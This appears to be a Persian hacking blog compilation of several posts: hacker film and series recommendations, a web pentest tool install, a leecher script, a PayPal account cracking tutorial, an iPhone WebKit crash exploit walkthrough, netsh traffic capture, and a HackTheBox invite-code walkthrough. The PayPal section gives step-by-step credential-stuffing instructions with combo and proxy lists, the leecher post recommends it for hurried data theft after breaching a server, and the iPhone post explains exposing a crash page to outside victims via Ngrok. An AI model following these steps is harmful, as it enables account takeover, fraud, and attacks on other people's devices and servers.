یک فیلم زیبا درباره هدف ادوارد اسنودن برای قربانی کردن زندگی خود و رسیدن به آنچه که به نظرش حق است. ادوارد اسنودن (جوزف گوردن لویت) یک هکر و مهندس کامپیوتر است که برای سازمان سیا کار می کند. فیلم زندگی اسنودن و ارتباط او با رومه نگاران را به تصویر کشیده و این دو زمان مختلف را به نمایش می گذارد. اجرای جوزف گوردن لویت در نقش اسنودن دیدنی است. شایلن وودلی هم در نقش دوست دختر اسنودن بازی زیبا و چندلایه ارائه می دهد. یک داستان زیبا و مهیج که با وجود مورد توجه قرار نگرفتن، یک اثر هنری زیباست و داستان و اجرای بازیگران از نقاط قوت آن محسوب می شوند. بدون شک این فیلم برترین اثر اقتباسی از زندگی ادوارد اسنودن است که بیننده را با زندگی او آشنا می کند.

برای دانلود فیلم Snowden کلیک کنید

فیلم و سریال با موضوع هک

۸- فیلم سینمایی هکر(ایرانی)
این سینمایی به نظر من یکی از کمیاب ترین سریال های موجود میباشد که در زمینه هک و امنیت است. اما اگر سری به آرشیو قدیمی فیلم فروشی محله تان بزنید شاید بتوانید آن را پیدا کنید! داستان این فیلم در مورد دانشجوی پسر و دختری در رشته کامپیوتر است که هر دو در برنامه نویسی نخبه به حساب می آیند. دانشجوی پسر در پلیس جرایم اینترنتی استخدام میشود و در آنطرف داستان دانشجوی دختر عضو یک گروه ی میشود و جدال این دو دانشجو که نامزد همدیگر نیز هستند در فیلم بسیار دیدنی است…

برای دانلود فیلم هکر (ایرانی) کلیک کنید

مطلب پیشنهادی :
نقشه راه ورود به دنیای هک و امنیت

فیلم و سریال با موضوع هک

۹-

فیلم سینمایی دارک وب
این سینمایی زیاد ارتباطی به هک و امنیت ندارد اما چون به پاتوق هکرها، دارک وب ، اشاره دارد این لیست جای گرفته. داستان فیلم از جایی شروع میشود که متایاس (یکی از بازیگران فیلم) یک لپتاپ پیدا میکند که بعد ها میفهمد این لپ تاپ یکی از اعضای دارک وب میباشد و از او میخواهند که لپ تاپ را پس بدهد اما او …
اگر به دارک وب علاقه دارید این فیلم نیز میتواند شما را سرگرم کند.

برای دانلود فیلم دارک وب کلیک کنید

فیلم و سریال با موضوع هک

۱۰-

فیلم سینمایی بلک هت
این فیلم که بسیاری آن را بهترین فیلم هکری می دانند، درباره یک هکر (کریس همسورث) که با اف بی آی همکاری می کند تا یک تروریست را، که می خواهد دستگاه های خنک کننده هسته ای را گرم کند تا خودش بتواند در بازار آزاد به سود برسد، شناسایی و دستگیر کنند. یک تریلر زیبا که ضعف هایی که در آن دیده می شود، بهترین اثر من نیست اما یک اثر قابل قبول است. با این حال من تلاش می کند استانداردهای این ژانر را در کنار هم قرار داده و یک اثر زیبا خلق کند. صحنه های اکشن، شات های مهیج و ریتم سریع آن از جمله نقاط قوت این اثر هستند. این فیلم با مقایسه حقیقت و دنیای دیجیتال یک اثر تریلر بصری و زیباست.

برای دانلود فیلم بلک هت کلیک کنید

سریال های هکری ایرانی و خارجی

سریال با موضوع هک

۱-

سریال آقای ربات
آقای ربات یکی از پرطرفدارترین سریال ها در زمینه هک میباشد. سریالی که زندگی یک هکر نابغه به نام الیوت را به تصویر میکشد که مشکلات روحی و روانی بسیاری نیز دارد و به نظر من همین ویژگی الیوت سریال را زیبا کرده. او با جمع آوری چند هکر نابغه دیگر سعی میکنند که از کامپیوترها و گوشی های هوشمند و تکنولوژی های دیگر به شبکه های کامپیوتری شرکت های بزرگ نفوذ کنند و در آنها اختلال ایجاد کنند. اگر علاقه مند به هک و امنیت هستید این سریال شدیدا به شما توصیه میشود چون که بسیاری از کارهای واقعی هکرها را در این سریال تماشا میکنید.

برای دانلود سریال آقای ربات کلیک کنید

سریال با موضوع هک

۲-

سریال اسکورپیون
داستان سریال براساس زندگی واقعی والتر اوبراین، یکی از معروفترین هکرهای تاریخ، میباشد. والتراوبراین یک نابغه به تمام معنا با ضریب هوشی ۱۹۷ است که توسط سازمان امنیت ملی ایالات متحده آمریکا استخدام میشود و در آنجا کنار افراد نابغه دیگر یک گروه به اسم عقرب تشکیل میدهند و فعالیتشان آغاز میشود. این سریال نیز به پیشنهاد خیلی از علاقه مندان هک یکی از بهترین سریال ها در مورد هک و هکر بازی انتخاب شده.

برای دانلود سریال اسکورپیون کلیک کنید

۳- سریال نهنگ آبی
درست است که بیشتر این سریال از سریال آقای ربات کپی برداری شده اما باز هم میتوانیم آن را در لیست محبوب ترین فیلم های هکری یاد کنیم. داستان سریال نهنگ آبی در مورد آرمین، دانشجوی کامپیوتر و هکر تیزهوشی است که با دختری در سایت کتابخوانی اش آشنا میشود و آرمین را با شرکتی آشنا میکند که ماجراهای زیادی را درست میکند.
اگر علاقه به فیلم های معمایی و ماجرایی دارید به شما این فیلم را پیشنهاد میکنیم.

سریال با موضوع هک

۴- سریال هوش سیاه
به جرات میتوان گفت این سریال یکی از بهترین سریال های ایرانی در مورد هک و امنیت میباشد. داستان فیلم در مورد درگیری پلیس جرایم رایانه ای با نابغه کامپیوترو الکترونیک و خرابکاری به نام جمشید کاظمی با نام تقلبی کامران پوریایی شده است. موضوع این سریال عمدتا به سواستفاده های بلوتوثی و ی های شرکت های هرمی و همچنین کپی نرم افزار ها و برنامه های مخرب است.
پیشنهاد میشود هر دو فصل این سریال را تماشا کنید چون سریال بسیار جذابی است.

برای دانلود سریال هوش سیاه کلیک کنید

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

بررسی امنیتی وب سایت

هر ابزار می تواند با امکانات منحصر به فرد خود برای رسیدن به نتیجه به ما کمک شایانی کند. در ادامه این اموزش می خواهیم یکی دیگر از ابزار های تست نفوذ وب را معرفی کنیم و با نحوه نصب و استفاده از ان اشنا شویم.

ابزار Tishna

این ابزار متشکل از چندین ابزار تست نفوذ است که به زبان های bash ، perl و پایتون نوشته شده اند که با نصب Tishna می توانید از همه این ابزار ها به راحتی استفاده کنید. برای استفاده از ابزار حتما باید یک سیستم عامل لینوکسی مانند کالی لینوکس داشته باشید و لازم است بدانید این ابزار در ویندوز قابل استفاده نیست.

برخی از امکانات ابزار

جمع اوری اطلاعات
انالیز باگ xss
انالیزو بررسی امنیتی باگ csrf
بایپس waf
و ….

نحوه نصب و استفاده از Tishna

در ابتدا در ترمینال لینوکس دستور زیر را برای دریافت ابزار وارد کنید :

git clone
https://github.com/haroonawanofficial/Tishna.git

سپس وارد دایرکتوری Tishna برای اجرای ابزار و بررسی امنیتی شوید :

cd Tishna

حال با دستور زیر سطح دسترسی تمامی فایل های bash را بالا ببرید :

chmod u+x *.sh

در اخر می توانید فایل اصلی ابزار را به صورت زیر نصب نمایید :

kali_installer.sh/.

نکته : تمامی پسشنیاز ها و موارد لازم در ابزار بعد از اجرا نصب خواهند شد و با سیستم شما ادقام می شوند.

بعد از اجرا برای مثال اگر بخواید بررسی امنیتی و اسکن برای پیدا کردن باگ lfi انجام دهید می توانید عدد 55 را وارد کنید و به همین صورت می توانید انواع امکانات ابزار را مشاهده کنید و از اعداد کنار ان ها استفاده نمایید.

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

لیچر یا لیچ چیست ؟

زمانی شما یک لینک دانلود داشته باشیم که بخواهیم ان را در یک سرور دیگر منتقل کنیم اولین کاری که به ذهن ما برای این کار می رسد این است که فایل را دانلود و سپس در سرور اپلود کنیم، اما اگر سرعت پهنای باند یا فضای ذخیره سازی در سیستم خود نداشته باشیم دیگر این کار امکان پذیر نخواهد بود و یا با مشکلات بسیار زیادی مواجه می شوید. برای حل این مشکل لیچر ها می توانند به ما کمک کنند در واقع سایت هایی رایگان اما با محدودیت با قابلیت لیچ کردن وجود دارند که می توانید با دادن لینک به ان ها دانلود خود را در سرور های ان ها انجام دهید.

اگر سرور خاصی را مدنظر خود دارید که این کار را در ان انجام دهید می توانید از اسکریپت های لیچر استفاده نمایید. ما در اخر اموزش یک اسکریپت برای لیچ کردن فایل به زبان php برای شما قرار داده ایم که می توانید با اپلود ان در سرور خود از ان برای دانلود از طریق لینک در سرور استفاده کنید.

مزیت لیچر ها در هک و امنیت

در بسیاری از مواقع بعد از

هک و نفوذ به یک سرور هکر زمان بسیار کمی برای ذخیره اطلاعات خواهد داشت چرا که با مطلع شدن ادمین از هک شدن سرور احتمال بسته شدن راه های نفوذ وجود دارد و به همین خاطر باید تمامی اطلاعات در سریع ترین حالت ممکن ذخیره شوند، در سرور ها به دلیل سرعت بالا شما می توانید این کار را در سریع ترین زمان ممکن انجام دهید و لینک دانلود اطلاعات را در لیچر وارد کنید.

نکته : مزیت لیچر ها برای امنیت می توان تهیه نسخه پشتیبان یا بکاپ سرور در سریع ترین زمان ممکن باشد.

اشنایی با Rapidleech

یک اسکریپت لیچر است که به زبان php نوشته شده و با اپلود ان در سرور می توانید ان را اجرا کنید و لینک های خود را برای دانلود در سرور به این اسکریپت بدهید تا به صورت کامل عملیات خود را انجام دهد، اسکرپیت های زیادی در این زمینه وجود دارند که Rapidleech یکی از بهترین های ان ها است و امکانات فوق العاده ای دارد که با ان ها اشنا می شوید.

برخی از امکانات اسکریپت

امکان ایجاد محدودیت در حجم فایل دانلودی
تنظیم حذف اتوماتیک
انتخاب مسیر ذخیره فایل دانلود شده
نمایش دقیق درصد در هنگام اپلود
تغیر زبان
تغیر ظاهر در اسکریپت لیچر
امکان تنظیم پروکسی
….

لینک دانلود

دریافت Rapidleech

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش هک پی پال و امنیت

آموزش هک پی پال و راه های مقابله با ان

پی پال یک روش پرداخت پول برای کشور های خارجی است که بسیاری از کشور های جهان از ان پشتیبانی می کنند و اگر وارد برخی از وب سایت های خارجی شده باشید حتما روش های پرداخت ان ها را مشاهده کرده اید که بیشتر ان ها از درگاه پی پال استفاده می کنند، هر شخص با اتصال حساب بانکی خارجی خود به پی پال می تواند یک حساب ایجاد کنید و به صورت انلاین از پی پال استفاده کند لازم به ذکر است که پی پال ایران را تحریم کرده و برای ساخت حساب ان مشکلات بسیار زیادی برای دور زدن تحریم ها خواهید داشت. به دلیل فراگیر بودن پی پال ما در این اموزش قصد داریم نحوه هک اکانت های ان را اموزش دهیم و در ادامه به راه های مقابله برای جلوگیری از هک شدن ان می پردازیم.

برنامه های زیادی مانند سنتری هستند که با استفاده از ان ها می توان عملیات بروت فورس را بر روی اکانت های پی پال انجام داد اما همه این برنامه ها نیاز به کانفیگ و روش های بایپس مختلف خود را دارند؛ برای ان که کار را برای خود اسان تر کنید می توانید از ابزار های دیگر برای اینکار استفاده کنید تا دیگر مشکلاتی هم در هنگام ساخت کانفیگ نداشته باشید.

آشنایی با Paypal Cracker

این ابزار ویندوزی برای هک و کرک اکنت پی پال ساخته شده است که با استفاده از ان می توانید بر روی پی پال حملات بروت فورس انجام دهید یعنی با تهیه یک کمبو لیست که دارای ایمیل و پسورد های بسیار زیادی است همه ان ها را تست می کنید تا به حساب های پی پال که با اطلاعات تست شده مطابقت دارند دسترسی بگیرید.

هک اکانت های کاربر هک شده و امنیت

نکته : دقت داشته باشید با ای پی ایران نمی توانید وارد وب سایت پی پال شوید

و برای کرک هم حتما باید از ای پی خارج از ایران استفاده کنید.

بعد از اجرای برنامه موارد زیر را به ترتیب برای کرک و هک پی پال انجام دهید.

نحوه کرک پی پال

1 – پروکسی لیست و کمبو لیست خودرا به برنامه بدهید

2 – تنظیمات را متناسب با سرعت اینترنتتان و نظر خودتون تنظیم کنید

در اخر هم کلید Start Brute را بزنید تا کرک اغاز شود.

امنیت

از انتشار ایمیل اصلی خود که برای موارد مهم استفاده می شود جلوگیری کنید.

از پسورد های سخت و طولانی با حروف بزرگ و کوچک برای جلوگیری از هک پی پال خود استفاده کنید.

محدودیت برای ورود با ای پی خاص در حساب کاربری خود قرار دهید.

ورود های غیر مجاز را با اطلاع رسانی های ایمیلی کنترل نمایید.

لینک دانلود

دانلود Paypal Cracker

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش ساخت کلید SSH با PuTTY

همه ما میدانیم که با پروتکل SSH میتوان به یک سرور از راه دور وصل شد و سرور را مانند سیستم خود کنترل و مدیریت کرد. این پروتکل یکی از پرکاربرد ترین پروتکل های اتصال به سرور در دنیا می باشد. در این مقاله به آموزش ساخت کلید SSH خواهیم پرداخت.

رمزنگاری همیشه یک بحث جذاب در کامپیوتر بوده و هست که به غیر قابل شنود بودن اطلاعات میان دو یا چند سیستم در شبکه توجه دارد و رمزنگاری که امروز قرار است درباره آن توضیح داده شود برای پروتکل SSH قابل استفاده است.

با ساخت کلید SSH میتوانید یک رمزنگاری موفق بین کلاینت و سرور خود ایجاد کنید. در برخی سایت های هاستینگ و VPS هنگام سفارش سرور، یکی از فیلد های اجباری ساخت کلید SSH است که در این آموزش به شما یاد خواهیم داد که چگونه با نرم افزار PuTTY یک کلید SSH بسازید. یکی از این کلیدها (Public Key) روی سرور شما قرار می‌گیرد و دیگری (Private Key) روی رایانۀ شما که قرار است به سرور متصل شود قرار می‌گیرد. پس از آن زمانی که خواسته باشید به سرور متصل شوید، این دو کلید با هم مقایسه می‌شوند و اگر با همدیگر مطابقت داشته باشند، اتصال از طریق SSH به سرور برقرار می‌شود.

در ابتدا PuTTYgen را که در محل نصب نرم افزار PuTTY وجود دارد را باز کنید. سپس در بخش Actions کلید Generate را انتخاب کنید تا کلید ساخته شود. با حرکت موس در بخش Key (قسمت خالی)مقدار رندوم کلید را انتخاب کرده که این روش به آنتروپی معروف است و برای ساخت هرچیزی که شبیه به بقیه نباشد به کار برده می شود.

کلید SSH

پس از ساخت کلید در قسمت Key Passphrase توصیه می شود که یک رمز عبور را نیز برای تضمین امنیت وارد کنید.

کلید SSH

پس از اتمام کار کلید را ذخیره کرده و کلید خصوصی (Private) را هم در یک مکان ایمن نگه داری کنید.

نحوه استفاده از کلید ها در SSH

برای استفاده از کلیدها در ssh، ابتدا وارد برنامه PuTTYgen شوید و روی تب File کلیک کنید سپس کلید Open را انتخاب و گزینه Load Private Key را انتخاب کنید و بعد از انتخاب فایل کلید رمز عبوری که برای آن درنظر گرفته اید را وارد کنید.

امیدوارم از این آموزش لذت و استفاده کافی رو برده باشید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش کرش کردن گوشی آیفون با لینک

سلام خدمت تمامی کاربران گل سایت تیم امنیتی اولترا

امروزه گوشی های هوشمند بخش جدا ناپذیری از زندگی ما شده اند، به طوری که ما در روز بیشر وقتمون رو داریم با گوشی های هوشمندمون میگذرونیم ، در ایران بیشتر کاربرانی که از گوشی های هوشمند استفاده میکنن سیستم عامل اندروید رو روی گوشی خودشون دارن و همیشه یه جنگی بین کسانی که از اندروید استفاده میکنن و کسانی که از سیستم عامل ای او اس استفاده میکنن بوده که باعث شده ذهنیت اشتباهی نسبت به اینکه گوشی شرکت اپل که به نام آیفون معروفه قابل هک شدن نیست و خیلی امنه!!!! بین کاربران به وجود بیاد ، در اینجا باز من این نکته رو تکرار میکنم که هر جفت این سیستم عامل ها قابل نفوذ هستن و با خرید گوشی آیفون قرار نیست که شما دیگه هک نشید (اینطور آدم ها رو دیدم که میگم حتما شما هم زیاد دیدید:)

توی این مطلب میخواهیم با یک آسیب پذیری که در سیستم عامل ای او اس وجود داره کار کنیم ، این

آسیب پذیری در موتور رندر Webkit وجود داره که باعث میشه اگر با گوشی آیفون یک صفحه وب رو باز کنید گوشیتون کرش کنه و ریستارت بشه!!!!

خب میریم سراغ کارمون در قدم اول با دستور زیر اکسپلویت مورد نظر رو دانلود میکنیم ، این اکسپلویت با HTML نوشته شده و با کمی دانش HTML میتونید کد ها رو درک کنید

بعد از دانلود وارد پوشه اکسپلویت میشم که محتویات پوشه رو ببینم

در این مرحله من یه وب سرور احتیاج دارم که در ویندوز میتونید از Xampp استفاده کنید و در کالی لینوکس هم از Apache که به صورت پیشفرض روی کالی لینوکس نصبه ، محتویات پوشه اکسپلویت رو به مسیر زیر انتقال میدیم

بعد از انتقال فایل های اکسپلویت با دستور زیر وب سرور کالی لینوکس رو استارت میکنیم

قبل از اینکه روی گوشی تست کنیم یه موضوعی رو من توضیح بدم ، در پوشه اکسپلویت دو تا فایل HTML وجود داره که یکیش به اسم index.html هست و فایل دیگه به اسم Original_Version.html هست که شما از هر دو این فایل های HTML میتونید استفاده بکنید فقط تنها فرقی که داره در فایل index.html عکس بکگراند به صورت لینک هست و شما میتونید به راحتی تغییرش بدید ولی در فایل Original_Version.html بکگراند به صورت انکود شده با انکودر base64 هست.

خب تا اینجا کار اکسپلویت ما آماده استفاده است من این اکسپلویت رو روی گوشی آیفون با نسخه ای او اس ۱۲ تست میکنم

من مرورگر رو برروی گوشی باز میکنم و ای پی وب سرور رو میدم ، ای پی وب سرور میشه ای پی سیستم عامل کالی لینوکس ما ، که اینجا چون من در شبکه داخلی خودم هستم ای پی پرایویت رو وارد میکنم ولی شما میتونید با پورت فورواردینگ یا استفاده از Ngrok این از این اکسپلویت خارج از شبکه خودتون هم استفاده کنید

بعد از وارد کردن ای پی وب سرور و اجرای فایل HTML گوشی ما کرش میکنه و ریستارت میشه

امیدوارم که از این مطلب لذت کافی رو برده باشید و اگر سوالی راجب این مطلب داشتید از طریق دیدگاه با ما در میان بزارید

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

ضبط کردن ترافیک شبکه به کمک ابزار Netsh در CMD

هنگامی که قادر به نصب برنامه Wireshark یا Microsoft Network Monitor یا سایر نرم افزار های مانیتورینگ شبکه در یک سرور نیستید، می توانید با اجرای برنامه netsh.exe که به صورت پیش فرض داخل ویندوز قرار دارد و از طریق command line قابل دسترس و اجرا می باشد، تمامی ترافیک های داخل شبکه خود را در حالت های مختلف ضبط کنید. از این عمل برای شنود (Sniff) عملکرد شبکه نیز می توان استفاده کرد. پس در این مقاله با نحوه ضبط کردن ترافیک شبکه” آشنا خواهید شد.

netsh چیست؟

ضبط کردن ترافیک شبکه با ابزار CMD

netsh یا Network Shell یک ابزار اسکریپتی یا نوعی برنامه نویسی خط فرمان است که امکان نمایش اطلاعات مربوط به شبکه خود که در حال اجرا هستند را فراهم می کند و به شما اجازه می دهد پیکربندی های کامپیوتر خود را که داخل شبکه ارتباطی قرار دارد یعنی به شبکه متصل و در حین کار کردن باشد را تغییر دهید. با اجرای این ابزار یا دستور می توان از بخش های مختلف در پرونده های دسته ای یا اسکریپت ها نیز استفاده کرد و حتی کامپیوترهای از راه دور و محلی local را می توان با استفاده از دستورات netsh پیکربندی کرد.

مراحل انجام ضبط کردن ترافیک شبکه در ویندوز

برای این کار لازم است ابتدا با سطح دسترسی administrator وارد محیط cmd شوید. سپس با زدن کلیدهای ترکیبی windows+R از صفحه کلید یا keyboard وارد پنجره Run شده سپس دستور cmd را تایپ کرده و کلیدهای Ctrl+Shift+Enter را به صورت همزمان می فشاریم، زدن این کلید ها معادل اجرای برنامه با Run as administrator می باشد. در محیط command Prompt دستورات زیر را اجرا می کنیم.

1	netsh trace start capture=yes tracefile=c:\dedsec.etl fileMode=single maxSize=250

با این دستور فایلی با پسوند etl در مسیر تعیین شده درایور C با نام dedsec.etl ایجاد شده که تا 250 مگابایت ظرفیت برای نگهداری اطلاعات ضبط شده یا کپچرشده از تمام ترافیک های شبکه به صورت کدگذاری شده به کار می رود.

چنانچه حجم این فایل کامل شود ضبط ترافیک شبکه متوقف می شود و اگر قصد توقف دستی را داشته باشیم میتوانیم با دستور زیر عملیات ضبط ترافیک شبکه را به اتمام برسانیم.

1	netsh trace stop

با اجرای دستور بالا یک فایل با پسوند Cab برای ما در همان مسیر ایجاد خواهد شد که این فایل را می توانیم با برنامه های مانیتوریگ مثل وایرشاک نیز اجرا کنیم در ضمن فایل ایجاد شده عملیات ضبط تمام ترافیک شبکه که با پسوند etl بود را می توان با برنامه Event Viewer در ویندوز باز کرد و اطلاعات مربوط به هر Log را دید.

برای دیدن وضعیت ترافیک شبکه از دستور زیر استفاده می کنیم:

1	netsh trace show status

برای دیدن تنظیمات بیشتری که قابلیت اعمال در ضبط ترافیک شبکه را دارند از دستور زیر استفاده می کنیم.

1	netsh trace show capturefilterHelp

چناچه قصد ضبط تمام ترافیک های بین سرور محلی و آدرس مقصد را داشته باشیم مطابق دستور زیر عمل می کنیم:

1	netsh trace start capture=yes Ethernet.Type=IPv4 IPv4.Address=x.x.x.x tracefile=c:\temp\trace.etl

اگرچه قصد ضبط کردن ترافیک یک پروتکل خاصی را داشته باشییم میتوانیم شماره پروتکل مربوطه را مطابق دستور زیر وارد کنیم.

1	netsh trace start capture=yes protocol=17 tracefile=c:\temp\trace.etl

در دستور بالا تمام ترافیک های پروتکل UDP که با شماره 17 مشخص شده است ضبط میشود. حجم پیش فرض برای توقف فایل ضبط ترافیک etl معادل 250مگابایت می باشد.

چنانچه کارت شبکه کامپیوتر یا سرور شما دارای چندین رابط یا اینترفیس مختلف اعم از Lan وWireless باشد و قصد ضبط کردن تمام ترافیک یک رابط خاصی را داشته باشید به صورت زیر عمل می کنیم.

1	netsh trace start capture=yes tracefile=c:\temp\trace.etl CaptureInterface=”Local Area Connection”

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

تست سیستم عامل ها به صورت انلاین

اگر به فکر تغیر سیستم عامل خود هستید یا می خواهید چند سیستم عامل در یک سیستم داشته باشید اما مشکل انتخاب سیستم عامل دارید این اموزش به شما کمک خواهد کرد چرا که به یکی از اصلی ترین این سیستم عامل ها یعنی کالی لینوکس هم خواهیم پرداخت.

تست سیستم عامل از طریق وب سایت های انلاین

اگر بخواهید یک سیستم عامل را قبل از دانلود برسی کنید باید تصاویر محیط و اطلاعات ان را جستجو و مشاهده کنید اما برای برسی دقیق تر این اطلاعات کافی نخواهد بود به همین خاطر وب سایت هایی وجود دارند که به شما امکان تست را به صورت انلاین از طریق مرورگر می دهند که با این کار دیگر نیازی به دانلود و نصب فقط برای تست نخواهید داشت و می توانید بعد از تست انتخاب درستی برای دانلود و نصب داشته باشید.

تست انلاین انواع لینوکس

در ادامه یک وب سایت را معررفی می کنیم که می توانید در ان انواع سیستم عامل ها را تست کنید که یکی از ویژگی های ان این که حتی کالی لینوکس هم برای تست در ان قرار دارد که با یک کلیک می توانید وارد محیط ان شده و حتی برای یادگیری خود با بخش های مختلف ان کار کنید.

معرفی وب سایت
DistroTest

همانطور که گفته شد از طریق این وب سایت می توانید انواع سیستم عامل ها را مانند یک سرور مجازی به صورت انلاین تست نمایید اما نکته ای که وجود دارد این است که این سرویس ها به شبکه اینترنت متصل نیستند و فقط به منظور تست ایجاد شده اند، در صورت نیاز می توانید از وب سایت اول سرور ، سرور مجازی با سیستم عامل دلخواه مانند کالی لینوکس تهیه کنید تا بدون محدودیت بتوانید از ان استفاده کنید.

لینک DistroTest :

https://distrotest.net/

وارد لینک بالا شده و از منو New Systems را انتخاب کنید تا تمامی OS های جدید را نمایش دهد.

مرحله اول از اجرای انلاین سیستم عامل

سپس کالی لینوکس یا سیستم عامل مورد نظر خود را پیدا کنید و بر روی گزینه details بزنید.

در این بخش گزینه Start را بزنید تا فعال شود.

مرحله دوم از نحوه استفاده از DistroTest

منتظر بمانید تا OS موردنظر شما در پنجره جدید در مرورگر شما باز شود.

با این روش به راحتی می توانید از انواع سیستم عامل ها استفاده نمایید.

برخی از سیستم عامل ها که در DistroTest قابل تست هستند :

Kali Linux
Arch Linux
Ubuntu
Deepin
لینوکس مانجارو
اندروید
….

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

حل چالش ثبت نام در سایت HackTheBox

سلام خدمت تمامی کاربران عزیز تیم امنیتی dedsec

خیلی از دوستان که همیشه به تیم ما لطف داشتن در تلگرام درخواست هایی زیادی رو مبنی بر حل چالش ها داده بودن ، و ما هم تصمیم گرفتیم با یه تیر دو نشون بزنیم هم درخواست دوستان عزیزمون رو اجرا کنیم و هم اینکه یه خورده تنوع بشه و از یکنواختی در بیایم، در این پست میخوایم با هم دیگه یاد بگیریم که چطوری در سایت HackTheBox ثبت نام کنیم ، الان خیلی ها فکر میکنن بابا یه ثبت نام دیگه یه ایمیل میدیم با پسورد تموم میشه میره اما خب کاش اینطوری بود ثبت نام در سایت HackTheBox یک چالش هست که شما باید حلش کنید تا بتونید در این سایت ثبت نام کنید پس با ما باشید تا این چالش رو با هم دیگه حل کنیم.

HackTheBox چیست ؟

قبل از اینکه بریم سراغ حل چالش یه توضیحی راجب سایت HackTheBox بدم بهتون ، سایت HackTheBox یه آزمایشگاه بسیار جامع تست نفوذ است که شما میتونید از ماشین ها و چلنج هایی که در این سایت قرار داره استفاده بکنید و دانش خودتون هم محک بزنید و هم افزایش بدید ، این سایت خدمات خودشو در دو پلن Free و Vip ارائه میده که شما میتونید با پرداخت ۱۰ یورو ماهانه از تمامی بخش های این سایت استفاده کنید.

خب میرم سراغ کارمون من وارد سایت

HackTheBox میشم و در پایین صفحه برروی گزینه Join کلیک میکنیم

بعد از زدن گزینه Join وارد یه صفحه جدیدی میشیم که از ما Invite Code میخواد اولین فکری که توی سرمون میاد اینه که شاید باید از کسی یه Invite Code بگیریم اما باید بگم که اینطوری نیست و خودمون باید Invite Code رو به دست بیاریم که از همین مرحله چالش ما شروع میشه

خب من روی صفحه راست کلیک میکنم و گزینه Inspect رو میزنم تا ببینم از سورس صفحه چه چیزی دستگیرم میشه ، بعد از اینکه گزینه Inspect رو زدید یه خورده میاییم پایین و میبینید که سه تا لینک فایل Js به صفحه لینک شده که یکی از اون فایل ها اسمش Inviteapi.main.js هست حس میکنم این فایل بتونه به ما کمک کنه برای رسیدن به Invite Code

من برای اینکه بفهمم این لینک بدرد میخوره یا نه این فایل Js رو فراخونی میکنم

خب در این صفحه محتویات فایل Js رو داره به من نشون میده که یه چیزی نظر منو جلب میکنه اونم makeInviteCode هست که یعنی میتونه برای ما یک Invite Code بسازه پس من برمیگردم در صفحه قبل یعنی این

لینک و در قسمت Console مرورگرم دستور makeInviteCode رو میزنم

بعد از زدن دستور makeInviteCode یه data به من میده که با

ROT13 انکریپت شده البته ممکنه برای شما انکریپت base64 بده ولی به من الان اینو داد ، خب من باید این data رو دیکریپت کنم تا ببینم که این سایت میخواد به من چی رو بگه پس وارد این

سایت میشم و data خودم رو میدم بهش تا دیکریپت کنه

بعد از دیکریپت کردن data در قسمت Results به ما میگه که برای ساخت Invite Code شما باید یک درخواست از نوع POST به این Url بدید پس من با کمک Curl این درخواست رو ارسال میکنیم

بعد از دادن درخواست میبینید که یک data باز به من داده که انکریپت شده اینبار با Base64 پس من data رو برمیدارم و دیکریپتش میکنم

خب میبینید که وقتی که data رو برای ما دیکریپت میکنه یه کد به ما برمیگردونه که این همون Invite Code هست و شما کافیه که این کد رو در قسمت Invite Code وارد کنید در این صفحه و بعدش به راحتی مراحل ثبت نام رو تکمیل کنید

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید